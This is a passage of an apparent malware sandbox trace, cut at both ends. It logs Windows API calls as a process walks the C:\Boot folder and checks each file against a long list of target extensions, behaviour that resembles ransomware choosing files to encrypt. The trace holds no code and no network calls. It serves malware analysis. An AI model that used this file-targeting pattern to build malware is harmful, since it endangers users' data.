returned -1 [0284.475] lstrlenW (lpString=".asr") returned 4 [0284.475] lstrcmpiW (lpString1=".asr", lpString2="LOG1") returned -1 [0284.475] lstrlenW (lpString=".asx") returned 4 [0284.475] lstrcmpiW (lpString1=".asx", lpString2="LOG1") returned -1 [0284.475] lstrlenW (lpString=".avi") returned 4 [0284.475] lstrcmpiW (lpString1=".avi", lpString2="LOG1") returned -1 [0284.475] lstrlenW (lpString=".avs") returned 4 [0284.475] lstrcmpiW (lpString1=".avs", lpString2="LOG1") returned -1 [0284.476] lstrlenW (lpString=".backup") returned 7 [0284.476] lstrcmpiW (lpString1=".backup", lpString2="CD.LOG1") returned -1 [0284.476] lstrlenW (lpString=".bak") returned 4 [0284.476] lstrcmpiW (lpString1=".bak", lpString2="LOG1") returned -1 [0284.476] lstrlenW (lpString=".bay") returned 4 [0284.476] lstrcmpiW (lpString1=".bay", lpString2="LOG1") returned -1 [0284.476] lstrlenW (lpString=".bd") returned 3 [0284.476] lstrcmpiW (lpString1=".bd", lpString2="OG1") returned -1 [0284.476] lstrlenW (lpString=".bin") returned 4 [0284.476] lstrcmpiW (lpString1=".bin", lpString2="LOG1") returned -1 [0284.476] lstrlenW (lpString=".bmp") returned 4 [0284.476] lstrcmpiW (lpString1=".bmp", lpString2="LOG1") returned -1 [0284.476] lstrlenW (lpString=".bz2") returned 4 [0284.476] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1 [0284.476] lstrlenW (lpString=".c") returned 2 [0284.476] lstrcmpiW (lpString1=".c", lpString2="G1") returned -1 [0284.476] lstrlenW (lpString=".cdr") returned 4 [0284.476] lstrcmpiW (lpString1=".cdr", lpString2="LOG1") returned -1 [0284.476] lstrlenW (lpString=".cer") returned 4 [0284.476] lstrcmpiW (lpString1=".cer", lpString2="LOG1") returned -1 [0284.476] lstrlenW (lpString=".cf") returned 3 [0284.476] lstrcmpiW (lpString1=".cf", lpString2="OG1") returned -1 [0284.476] lstrlenW (lpString=".cfc") returned 4 [0284.476] lstrcmpiW (lpString1=".cfc", lpString2="LOG1") returned -1 [0284.476] lstrlenW (lpString=".cfm") returned 4 [0284.476] lstrcmpiW (lpString1=".cfm", lpString2="LOG1") returned -1 [0284.476] lstrlenW (lpString=".cfml") returned 5 [0284.476] lstrcmpiW (lpString1=".cfml", lpString2=".LOG1") returned -1 [0284.476] lstrlenW (lpString=".cfu") returned 4 [0284.476] lstrcmpiW (lpString1=".cfu", lpString2="LOG1") returned -1 [0284.476] lstrlenW (lpString=".chm") returned 4 [0284.476] lstrcmpiW (lpString1=".chm", lpString2="LOG1") returned -1 [0284.476] lstrlenW (lpString=".cin") returned 4 [0284.476] lstrcmpiW (lpString1=".cin", lpString2="LOG1") returned -1 [0284.477] lstrlenW (lpString=".class") returned 6 [0284.477] lstrcmpiW (lpString1=".class", lpString2="D.LOG1") returned -1 [0284.477] lstrlenW (lpString=".clx") returned 4 [0284.477] lstrcmpiW (lpString1=".clx", lpString2="LOG1") returned -1 [0284.477] lstrlenW (lpString=".config") returned 7 [0284.477] lstrcmpiW (lpString1=".config", lpString2="CD.LOG1") returned -1 [0284.477] lstrlenW (lpString=".cpp") returned 4 [0284.477] lstrcmpiW (lpString1=".cpp", lpString2="LOG1") returned -1 [0284.477] lstrlenW (lpString=".cr2") returned 4 [0284.477] lstrcmpiW (lpString1=".cr2", lpString2="LOG1") returned -1 [0284.477] lstrlenW (lpString=".crt") returned 4 [0284.477] lstrcmpiW (lpString1=".crt", lpString2="LOG1") returned -1 [0284.477] lstrlenW (lpString=".crw") returned 4 [0284.477] lstrcmpiW (lpString1=".crw", lpString2="LOG1") returned -1 [0284.477] lstrlenW (lpString=".cs") returned 3 [0284.477] lstrcmpiW (lpString1=".cs", lpString2="OG1") returned -1 [0284.477] lstrlenW (lpString=".css") returned 4 [0284.477] lstrcmpiW (lpString1=".css", lpString2="LOG1") returned -1 [0284.477] lstrlenW (lpString=".csv") returned 4 [0284.477] lstrcmpiW (lpString1=".csv", lpString2="LOG1") returned -1 [0284.477] lstrlenW (lpString=".cub") returned 4 [0284.477] lstrcmpiW (lpString1=".cub", lpString2="LOG1") returned -1 [0284.477] lstrlenW (lpString=".dae") returned 4 [0284.477] lstrcmpiW (lpString1=".dae", lpString2="LOG1") returned -1 [0284.477] lstrlenW (lpString=".dat") returned 4 [0284.477] lstrcmpiW (lpString1=".dat", lpString2="LOG1") returned -1 [0284.477] lstrlenW (lpString=".db") returned 3 [0284.477] lstrcmpiW (lpString1=".db", lpString2="OG1") returned -1 [0284.477] lstrlenW (lpString=".dbf") returned 4 [0284.477] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1 [0284.477] lstrlenW (lpString=".dbx") returned 4 [0284.478] lstrcmpiW (lpString1=".dbx", lpString2="LOG1") returned -1 [0284.478] lstrlenW (lpString=".dc3") returned 4 [0284.478] lstrcmpiW (lpString1=".dc3", lpString2="LOG1") returned -1 [0284.478] lstrlenW (lpString=".dcm") returned 4 [0284.478] lstrcmpiW (lpString1=".dcm", lpString2="LOG1") returned -1 [0284.478] lstrlenW (lpString=".dcr") returned 4 [0284.478] lstrcmpiW (lpString1=".dcr", lpString2="LOG1") returned -1 [0284.478] lstrlenW (lpString=".der") returned 4 [0284.478] lstrcmpiW (lpString1=".der", lpString2="LOG1") returned -1 [0284.478] lstrlenW (lpString=".dib") returned 4 [0284.478] lstrcmpiW (lpString1=".dib", lpString2="LOG1") returned -1 [0284.478] lstrlenW (lpString=".dic") returned 4 [0284.478] lstrcmpiW (lpString1=".dic", lpString2="LOG1") returned -1 [0284.478] lstrlenW (lpString=".dif") returned 4 [0284.478] lstrcmpiW (lpString1=".dif", lpString2="LOG1") returned -1 [0284.478] lstrlenW (lpString=".divx") returned 5 [0284.478] lstrcmpiW (lpString1=".divx", lpString2=".LOG1") returned -1 [0284.478] lstrlenW (lpString=".djvu") returned 5 [0284.478] lstrcmpiW (lpString1=".djvu", lpString2=".LOG1") returned -1 [0284.478] lstrlenW (lpString=".dng") returned 4 [0284.478] lstrcmpiW (lpString1=".dng", lpString2="LOG1") returned -1 [0284.478] lstrlenW (lpString=".doc") returned 4 [0284.478] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1 [0284.478] lstrlenW (lpString=".docm") returned 5 [0284.478] lstrcmpiW (lpString1=".docm", lpString2=".LOG1") returned -1 [0284.478] lstrlenW (lpString=".docx") returned 5 [0284.478] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1 [0284.478] lstrlenW (lpString=".dot") returned 4 [0284.478] lstrcmpiW (lpString1=".dot", lpString2="LOG1") returned -1 [0284.478] lstrlenW (lpString=".dotm") returned 5 [0284.478] lstrcmpiW (lpString1=".dotm", lpString2=".LOG1") returned -1 [0284.478] lstrlenW (lpString=".dotx") returned 5 [0284.478] lstrcmpiW (lpString1=".dotx", lpString2=".LOG1") returned -1 [0284.478] lstrlenW (lpString=".dpx") returned 4 [0284.479] lstrcmpiW (lpString1=".dpx", lpString2="LOG1") returned -1 [0284.479] lstrlenW (lpString=".dqy") returned 4 [0284.479] lstrcmpiW (lpString1=".dqy", lpString2="LOG1") returned -1 [0284.479] lstrlenW (lpString=".dsn") returned 4 [0284.479] lstrcmpiW (lpString1=".dsn", lpString2="LOG1") returned -1 [0284.479] lstrlenW (lpString=".dt") returned 3 [0284.479] lstrcmpiW (lpString1=".dt", lpString2="OG1") returned -1 [0284.479] lstrlenW (lpString=".dtd") returned 4 [0284.479] lstrcmpiW (lpString1=".dtd", lpString2="LOG1") returned -1 [0284.479] lstrlenW (lpString=".dwg") returned 4 [0284.479] lstrcmpiW (lpString1=".dwg", lpString2="LOG1") returned -1 [0284.479] lstrlenW (lpString=".dwt") returned 4 [0284.479] lstrcmpiW (lpString1=".dwt", lpString2="LOG1") returned -1 [0284.479] lstrlenW (lpString=".dx") returned 3 [0284.479] lstrcmpiW (lpString1=".dx", lpString2="OG1") returned -1 [0284.479] lstrlenW (lpString=".dxf") returned 4 [0284.479] lstrcmpiW (lpString1=".dxf", lpString2="LOG1") returned -1 [0284.479] lstrlenW (lpString=".edml") returned 5 [0284.479] lstrcmpiW (lpString1=".edml", lpString2=".LOG1") returned -1 [0284.479] lstrlenW (lpString=".efd") returned 4 [0284.479] lstrcmpiW (lpString1=".efd", lpString2="LOG1") returned -1 [0284.479] lstrlenW (lpString=".elf") returned 4 [0284.479] lstrcmpiW (lpString1=".elf", lpString2="LOG1") returned -1 [0284.479] lstrlenW (lpString=".emf") returned 4 [0284.479] lstrcmpiW (lpString1=".emf", lpString2="LOG1") returned -1 [0284.479] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0284.480] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc47bb525, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0284.480] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0284.501] FindFirstFileW (in: lpFileName="C:\\Boot\\bg-BG\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc47bb525, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x39483a8 [0284.502] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc47bb525, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0284.502] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0284.503] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0284.503] FindClose (in: hFindFile=0x39483a8 | out: hFindFile=0x39483a8) returned 1 [0284.503] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0284.503] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef4e6d79, ftCreationTime.dwHighDateTime=0x1d3273d, ftLastAccessTime.dwLowDateTime=0xef4e6d79, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x175a0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="bootspaces.dll", cAlternateFileName="BOOTSP~1.DLL")) returned 1 [0284.503] lstrlenW (lpString="bootspaces.dll") returned 14 [0284.503] lstrlenW (lpString=".1cd") returned 4 [0284.503] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0284.503] lstrlenW (lpString=".3ds") returned 4 [0284.503] lstrcmpiW (lpString1=".3ds", lpString2=".dll") returned -1 [0284.503] lstrlenW (lpString=".3fr") returned 4 [0284.503] lstrcmpiW (lpString1=".3fr", lpString2=".dll") returned -1 [0284.503] lstrlenW (lpString=".3g2") returned 4 [0284.503] lstrcmpiW (lpString1=".3g2", lpString2=".dll") returned -1 [0284.503] lstrlenW (lpString=".3gp") returned 4 [0284.503] lstrcmpiW (lpString1=".3gp", lpString2=".dll") returned -1 [0284.503] lstrlenW (lpString=".7z") returned 3 [0284.504] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0284.504] lstrlenW (lpString=".accda") returned 6 [0284.504] lstrcmpiW (lpString1=".accda", lpString2="es.dll") returned -1 [0284.504] lstrlenW (lpString=".accdb") returned 6 [0284.504] lstrcmpiW (lpString1=".accdb", lpString2="es.dll") returned -1 [0284.504] lstrlenW (lpString=".accdc") returned 6 [0284.504] lstrcmpiW (lpString1=".accdc", lpString2="es.dll") returned -1 [0284.504] lstrlenW (lpString=".accde") returned 6 [0284.504] lstrcmpiW (lpString1=".accde", lpString2="es.dll") returned -1 [0284.504] lstrlenW (lpString=".accdt") returned 6 [0284.504] lstrcmpiW (lpString1=".accdt", lpString2="es.dll") returned -1 [0284.504] lstrlenW (lpString=".accdw") returned 6 [0284.504] lstrcmpiW (lpString1=".accdw", lpString2="es.dll") returned -1 [0284.504] lstrlenW (lpString=".adb") returned 4 [0284.504] lstrcmpiW (lpString1=".adb", lpString2=".dll") returned -1 [0284.504] lstrlenW (lpString=".adp") returned 4 [0284.504] lstrcmpiW (lpString1=".adp", lpString2=".dll") returned -1 [0284.504] lstrlenW (lpString=".ai") returned 3 [0284.504] lstrcmpiW (lpString1=".ai", lpString2="dll") returned -1 [0284.504] lstrlenW (lpString=".ai3") returned 4 [0284.504] lstrcmpiW (lpString1=".ai3", lpString2=".dll") returned -1 [0284.504] lstrlenW (lpString=".ai4") returned 4 [0284.504] lstrcmpiW (lpString1=".ai4", lpString2=".dll") returned -1 [0284.504] lstrlenW (lpString=".ai5") returned 4 [0284.504] lstrcmpiW (lpString1=".ai5", lpString2=".dll") returned -1 [0284.504] lstrlenW (lpString=".ai6") returned 4 [0284.504] lstrcmpiW (lpString1=".ai6", lpString2=".dll") returned -1 [0284.505] lstrlenW (lpString=".ai7") returned 4 [0284.505] lstrcmpiW (lpString1=".ai7", lpString2=".dll") returned -1 [0284.505] lstrlenW (lpString=".ai8") returned 4 [0284.505] lstrcmpiW (lpString1=".ai8", lpString2=".dll") returned -1 [0284.505] lstrlenW (lpString=".anim") returned 5 [0284.505] lstrcmpiW (lpString1=".anim", lpString2="s.dll") returned -1 [0284.505] lstrlenW (lpString=".arw") returned 4 [0284.505] lstrcmpiW (lpString1=".arw", lpString2=".dll") returned -1 [0284.505] lstrlenW (lpString=".as") returned 3 [0284.505] lstrcmpiW (lpString1=".as", lpString2="dll") returned -1 [0284.505] lstrlenW (lpString=".asa") returned 4 [0284.505] lstrcmpiW (lpString1=".asa", lpString2=".dll") returned -1 [0284.505] lstrlenW (lpString=".asc") returned 4 [0284.505] lstrcmpiW (lpString1=".asc", lpString2=".dll") returned -1 [0284.505] lstrlenW (lpString=".ascx") returned 5 [0284.505] lstrcmpiW (lpString1=".ascx", lpString2="s.dll") returned -1 [0284.505] lstrlenW (lpString=".asm") returned 4 [0284.505] lstrcmpiW (lpString1=".asm", lpString2=".dll") returned -1 [0284.505] lstrlenW (lpString=".asmx") returned 5 [0284.505] lstrcmpiW (lpString1=".asmx", lpString2="s.dll") returned -1 [0284.505] lstrlenW (lpString=".asp") returned 4 [0284.505] lstrcmpiW (lpString1=".asp", lpString2=".dll") returned -1 [0284.506] lstrlenW (lpString=".aspx") returned 5 [0284.506] lstrcmpiW (lpString1=".aspx", lpString2="s.dll") returned -1 [0284.506] lstrlenW (lpString=".asr") returned 4 [0284.506] lstrcmpiW (lpString1=".asr", lpString2=".dll") returned -1 [0284.506] lstrlenW (lpString=".asx") returned 4 [0284.506] lstrcmpiW (lpString1=".asx", lpString2=".dll") returned -1 [0284.506] lstrlenW (lpString=".avi") returned 4 [0284.506] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0284.506] lstrlenW (lpString=".avs") returned 4 [0284.506] lstrcmpiW (lpString1=".avs", lpString2=".dll") returned -1 [0284.506] lstrlenW (lpString=".backup") returned 7 [0284.506] lstrcmpiW (lpString1=".backup", lpString2="ces.dll") returned -1 [0284.506] lstrlenW (lpString=".bak") returned 4 [0284.506] lstrcmpiW (lpString1=".bak", lpString2=".dll") returned -1 [0284.506] lstrlenW (lpString=".bay") returned 4 [0284.506] lstrcmpiW (lpString1=".bay", lpString2=".dll") returned -1 [0284.506] lstrlenW (lpString=".bd") returned 3 [0284.506] lstrcmpiW (lpString1=".bd", lpString2="dll") returned -1 [0284.506] lstrlenW (lpString=".bin") returned 4 [0284.506] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0284.506] lstrlenW (lpString=".bmp") returned 4 [0284.506] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0284.506] lstrlenW (lpString=".bz2") returned 4 [0284.506] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0284.507] lstrlenW (lpString=".c") returned 2 [0284.507] lstrcmpiW (lpString1=".c", lpString2="ll") returned -1 [0284.507] lstrlenW (lpString=".cdr") returned 4 [0284.507] lstrcmpiW (lpString1=".cdr", lpString2=".dll") returned -1 [0284.507] lstrlenW (lpString=".cer") returned 4 [0284.507] lstrcmpiW (lpString1=".cer", lpString2=".dll") returned -1 [0284.507] lstrlenW (lpString=".cf") returned 3 [0284.507] lstrcmpiW (lpString1=".cf", lpString2="dll") returned -1 [0284.507] lstrlenW (lpString=".cfc") returned 4 [0284.507] lstrcmpiW (lpString1=".cfc", lpString2=".dll") returned -1 [0284.507] lstrlenW (lpString=".cfm") returned 4 [0284.507] lstrcmpiW (lpString1=".cfm", lpString2=".dll") returned -1 [0284.507] lstrlenW (lpString=".cfml") returned 5 [0284.507] lstrcmpiW (lpString1=".cfml", lpString2="s.dll") returned -1 [0284.507] lstrlenW (lpString=".cfu") returned 4 [0284.507] lstrcmpiW (lpString1=".cfu", lpString2=".dll") returned -1 [0284.507] lstrlenW (lpString=".chm") returned 4 [0284.507] lstrcmpiW (lpString1=".chm", lpString2=".dll") returned -1 [0284.507] lstrlenW (lpString=".cin") returned 4 [0284.507] lstrcmpiW (lpString1=".cin", lpString2=".dll") returned -1 [0284.507] lstrlenW (lpString=".class") returned 6 [0284.507] lstrcmpiW (lpString1=".class", lpString2="es.dll") returned -1 [0284.507] lstrlenW (lpString=".clx") returned 4 [0284.507] lstrcmpiW (lpString1=".clx", lpString2=".dll") returned -1 [0284.507] lstrlenW (lpString=".config") returned 7 [0284.507] lstrcmpiW (lpString1=".config", lpString2="ces.dll") returned -1 [0284.507] lstrlenW (lpString=".cpp") returned 4 [0284.507] lstrcmpiW (lpString1=".cpp", lpString2=".dll") returned -1 [0284.508] lstrlenW (lpString=".cr2") returned 4 [0284.508] lstrcmpiW (lpString1=".cr2", lpString2=".dll") returned -1 [0284.508] lstrlenW (lpString=".crt") returned 4 [0284.508] lstrcmpiW (lpString1=".crt", lpString2=".dll") returned -1 [0284.508] lstrlenW (lpString=".crw") returned 4 [0284.508] lstrcmpiW (lpString1=".crw", lpString2=".dll") returned -1 [0284.508] lstrlenW (lpString=".cs") returned 3 [0284.508] lstrcmpiW (lpString1=".cs", lpString2="dll") returned -1 [0284.508] lstrlenW (lpString=".css") returned 4 [0284.508] lstrcmpiW (lpString1=".css", lpString2=".dll") returned -1 [0284.508] lstrlenW (lpString=".csv") returned 4 [0284.508] lstrcmpiW (lpString1=".csv", lpString2=".dll") returned -1 [0284.508] lstrlenW (lpString=".cub") returned 4 [0284.508] lstrcmpiW (lpString1=".cub", lpString2=".dll") returned -1 [0284.508] lstrlenW (lpString=".dae") returned 4 [0284.508] lstrcmpiW (lpString1=".dae", lpString2=".dll") returned -1 [0284.508] lstrlenW (lpString=".dat") returned 4 [0284.508] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0284.508] lstrlenW (lpString=".db") returned 3 [0284.508] lstrcmpiW (lpString1=".db", lpString2="dll") returned -1 [0284.508] lstrlenW (lpString=".dbf") returned 4 [0284.508] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0284.508] lstrlenW (lpString=".dbx") returned 4 [0284.508] lstrcmpiW (lpString1=".dbx", lpString2=".dll") returned -1 [0284.508] lstrlenW (lpString=".dc3") returned 4 [0284.508] lstrcmpiW (lpString1=".dc3", lpString2=".dll") returned -1 [0284.508] lstrlenW (lpString=".dcm") returned 4 [0284.509] lstrcmpiW (lpString1=".dcm", lpString2=".dll") returned -1 [0284.509] lstrlenW (lpString=".dcr") returned 4 [0284.509] lstrcmpiW (lpString1=".dcr", lpString2=".dll") returned -1 [0284.509] lstrlenW (lpString=".der") returned 4 [0284.509] lstrcmpiW (lpString1=".der", lpString2=".dll") returned -1 [0284.509] lstrlenW (lpString=".dib") returned 4 [0284.509] lstrcmpiW (lpString1=".dib", lpString2=".dll") returned -1 [0284.509] lstrlenW (lpString=".dic") returned 4 [0284.509] lstrcmpiW (lpString1=".dic", lpString2=".dll") returned -1 [0284.509] lstrlenW (lpString=".dif") returned 4 [0284.509] lstrcmpiW (lpString1=".dif", lpString2=".dll") returned -1 [0284.509] lstrlenW (lpString=".divx") returned 5 [0284.509] lstrcmpiW (lpString1=".divx", lpString2="s.dll") returned -1 [0284.509] lstrlenW (lpString=".djvu") returned 5 [0284.509] lstrcmpiW (lpString1=".djvu", lpString2="s.dll") returned -1 [0284.509] lstrlenW (lpString=".dng") returned 4 [0284.509] lstrcmpiW (lpString1=".dng", lpString2=".dll") returned 1 [0284.509] lstrlenW (lpString=".doc") returned 4 [0284.509] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0284.509] lstrlenW (lpString=".docm") returned 5 [0284.509] lstrcmpiW (lpString1=".docm", lpString2="s.dll") returned -1 [0284.509] lstrlenW (lpString=".docx") returned 5 [0284.509] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0284.509] lstrlenW (lpString=".dot") returned 4 [0284.509] lstrcmpiW (lpString1=".dot", lpString2=".dll") returned 1 [0284.509] lstrlenW (lpString=".dotm") returned 5 [0284.509] lstrcmpiW (lpString1=".dotm", lpString2="s.dll") returned -1 [0284.509] lstrlenW (lpString=".dotx") returned 5 [0284.510] lstrcmpiW (lpString1=".dotx", lpString2="s.dll") returned -1 [0284.510] lstrlenW (lpString=".dpx") returned 4 [0284.510] lstrcmpiW (lpString1=".dpx", lpString2=".dll") returned 1 [0284.510] lstrlenW (lpString=".dqy") returned 4 [0284.510] lstrcmpiW (lpString1=".dqy", lpString2=".dll") returned 1 [0284.510] lstrlenW (lpString=".dsn") returned 4 [0284.510] lstrcmpiW (lpString1=".dsn", lpString2=".dll") returned 1 [0284.510] lstrlenW (lpString=".dt") returned 3 [0284.510] lstrcmpiW (lpString1=".dt", lpString2="dll") returned -1 [0284.510] lstrlenW (lpString=".dtd") returned 4 [0284.510] lstrcmpiW (lpString1=".dtd", lpString2=".dll") returned 1 [0284.510] lstrlenW (lpString=".dwg") returned 4 [0284.510] lstrcmpiW (lpString1=".dwg", lpString2=".dll") returned 1 [0284.510] lstrlenW (lpString=".dwt") returned 4 [0284.510] lstrcmpiW (lpString1=".dwt", lpString2=".dll") returned 1 [0284.510] lstrlenW (lpString=".dx") returned 3 [0284.510] lstrcmpiW (lpString1=".dx", lpString2="dll") returned -1 [0284.510] lstrlenW (lpString=".dxf") returned 4 [0284.510] lstrcmpiW (lpString1=".dxf", lpString2=".dll") returned 1 [0284.510] lstrlenW (lpString=".edml") returned 5 [0284.510] lstrcmpiW (lpString1=".edml", lpString2="s.dll") returned -1 [0284.510] lstrlenW (lpString=".efd") returned 4 [0284.510] lstrcmpiW (lpString1=".efd", lpString2=".dll") returned 1 [0284.510] lstrlenW (lpString=".elf") returned 4 [0284.510] lstrcmpiW (lpString1=".elf", lpString2=".dll") returned 1 [0284.510] lstrlenW (lpString=".emf") returned 4 [0284.510] lstrcmpiW (lpString1=".emf", lpString2=".dll") returned 1 [0284.510] lstrlenW (lpString=".emz") returned 4 [0284.511] lstrcmpiW (lpString1=".emz", lpString2=".dll") returned 1 [0284.511] lstrlenW (lpString=".epf") returned 4 [0284.511] lstrcmpiW (lpString1=".epf", lpString2=".dll") returned 1 [0284.511] lstrlenW (lpString=".eps") returned 4 [0284.511] lstrcmpiW (lpString1=".eps", lpString2=".dll") returned 1 [0284.511] lstrlenW (lpString=".epsf") returned 5 [0284.511] lstrcmpiW (lpString1=".epsf", lpString2="s.dll") returned -1 [0284.511] lstrlenW (lpString=".epsp") returned 5 [0284.511] lstrcmpiW (lpString1=".epsp", lpString2="s.dll") returned -1 [0284.511] lstrlenW (lpString=".erf") returned 4 [0284.511] lstrcmpiW (lpString1=".erf", lpString2=".dll") returned 1 [0284.511] lstrlenW (lpString=".exr") returned 4 [0284.511] lstrcmpiW (lpString1=".exr", lpString2=".dll") returned 1 [0284.511] lstrlenW (lpString=".f4v") returned 4 [0284.511] lstrcmpiW (lpString1=".f4v", lpString2=".dll") returned 1 [0284.511] lstrlenW (lpString=".fido") returned 5 [0284.511] lstrcmpiW (lpString1=".fido", lpString2="s.dll") returned -1 [0284.511] lstrlenW (lpString=".flm") returned 4 [0284.511] lstrcmpiW (lpString1=".flm", lpString2=".dll") returned 1 [0284.511] lstrlenW (lpString=".flv") returned 4 [0284.511] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0284.511] lstrlenW (lpString=".frm") returned 4 [0284.511] lstrcmpiW (lpString1=".frm", lpString2=".dll") returned 1 [0284.511] lstrlenW (lpString=".fxg") returned 4 [0284.511] lstrcmpiW (lpString1=".fxg", lpString2=".dll") returned 1 [0284.511] lstrlenW (lpString=".geo") returned 4 [0284.511] lstrcmpiW (lpString1=".geo", lpString2=".dll") returned 1 [0284.511] lstrlenW (lpString=".gif") returned 4 [0284.511] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0284.511] lstrlenW (lpString=".grs") returned 4 [0284.511] lstrcmpiW (lpString1=".grs", lpString2=".dll") returned 1 [0284.512] lstrlenW (lpString=".gz") returned 3 [0284.512] lstrcmpiW (lpString1=".gz", lpString2="dll") returned -1 [0284.512] lstrlenW (lpString=".h") returned 2 [0284.512] lstrcmpiW (lpString1=".h", lpString2="ll") returned -1 [0284.512] lstrlenW (lpString=".hdr") returned 4 [0284.512] lstrcmpiW (lpString1=".hdr", lpString2=".dll") returned 1 [0284.512] lstrlenW (lpString=".hpp") returned 4 [0284.512] lstrcmpiW (lpString1=".hpp", lpString2=".dll") returned 1 [0284.512] lstrlenW (lpString=".hta") returned 4 [0284.512] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0284.512] lstrlenW (lpString=".htc") returned 4 [0284.512] lstrcmpiW (lpString1=".htc", lpString2=".dll") returned 1 [0284.512] lstrlenW (lpString=".htm") returned 4 [0284.512] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0284.512] lstrlenW (lpString=".html") returned 5 [0284.512] lstrcmpiW (lpString1=".html", lpString2="s.dll") returned -1 [0284.512] lstrlenW (lpString=".icb") returned 4 [0284.512] lstrcmpiW (lpString1=".icb", lpString2=".dll") returned 1 [0284.512] lstrlenW (lpString=".ics") returned 4 [0284.512] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0284.512] lstrlenW (lpString=".iff") returned 4 [0284.512] lstrcmpiW (lpString1=".iff", lpString2=".dll") returned 1 [0284.512] lstrlenW (lpString=".inc") returned 4 [0284.512] lstrcmpiW (lpString1=".inc", lpString2=".dll") returned 1 [0284.512] lstrlenW (lpString=".indd") returned 5 [0284.512] lstrcmpiW (lpString1=".indd", lpString2="s.dll") returned -1 [0284.512] lstrlenW (lpString=".ini") returned 4 [0284.512] lstrcmpiW (lpString1=".ini", 